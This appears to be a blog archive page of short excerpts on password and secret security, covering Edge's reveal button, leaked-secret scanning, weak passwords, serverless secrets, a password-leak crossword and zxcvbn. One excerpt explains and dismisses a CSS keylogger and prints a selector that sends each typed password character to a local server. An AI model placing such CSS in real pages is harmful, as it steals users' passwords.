Customize the Password Hide/Reveal Button in Microsoft Edge

If you’re using Microsoft Edge, you might have noticed that it sports a “Reveal Password” control — a little eye icon — automatically injected on the end side of password inputs. As per the Edge Developer Docs: The password input type in Microsoft Edge includes a password reveal control. To make sure that the password is entered …

Ahh shhgit! – Find leaked secrets in real time across GitHub, GitLab and BitBucket

Software developers can accidentally leak sensitive information, particularly secret keys for third party services, across code hosting platforms such as GitHub, GitLab and BitBucket. These secrets — including the data they were protecting — end up in the hands of bad actors which ultimately leads to significant data breaches. Imagine being able to monitor the …

Princesses make terrible passwords

From the Firefox Blog: When the Disney+ streaming service rolled out, millions of people flocked to set up accounts. And within a week, thousands of poor unfortunate souls reported that their Disney passwords were hacked. According to media reports, some Disney+ account holders have lost their account access while hackers have sold their logins online. …

Secrets in Serverless

Good post on how and where to store your secrets when working in a Serverless / Cloud Environment — something I was wondering about myself a little while ago. Serverless applications and cloud functions often need to communicate with an upstream API or service. Perhaps they require a username and password to connect to a …

CSS Keylogger (and why you shouldn’t worry about it)

Leveraging CSS attribute selectors, it is – in theory – possible to write a keylogger in pure CSS. The selector below, for example, targets all input[type="password"] elements whose last character is an a: input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } The theory goes that whenever a user presses the a character inside an input[type="password"], a request to …

Adobe Crossword

A crossword based on the Adobe password leak. The answers to the crossword are chosen from the 1000 most used passwords for Adobe user accounts from the recent password leak. The clues are up to 50 of the most commonly used hints for each of the passwords. Hilarious stuff! Adobe Crossword → Inspired by XKCD …

zxcvbn: realistic password strength estimation

Simplistic strength estimation gives bad advice. Without checking for common patterns, the practice of encouraging numbers and symbols means encouraging passwords that might only be slightly harder for a computer to crack, and yet frustratingly harder for a human to remember. zxcvbn, named after a crappy password, is a JavaScript password strength estimation library. Use …